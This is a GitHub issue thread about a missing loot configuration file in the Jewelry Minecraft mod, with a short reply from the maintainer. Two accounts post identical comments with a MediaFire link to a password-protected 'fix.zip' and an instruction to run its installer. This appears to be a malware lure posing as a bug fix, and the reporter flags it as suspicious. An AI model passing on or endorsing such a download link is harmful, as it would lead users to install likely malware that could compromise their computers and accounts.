### ISSUE TITLE
'loot' configuration file missing

### ISSUE THREAD

**Issue by von-get** [ZsoltMolnarrr/Jewelry#17]
The configuration section of the modrinth page lists a loot configuration file as one of the files available for tweaking, however, only 'items_v4.json' and 'villages.json' exist.

Minecraft 1.20.1
Fabric Loader 0.16.2
Jewelry 1.3.6

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by von-get** [comment]
That looks suspicious...  If there's a fix, I'd like more information and either a jar or a config file.

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZsoltMolnarrr** [comment]
Public pages will be updated.
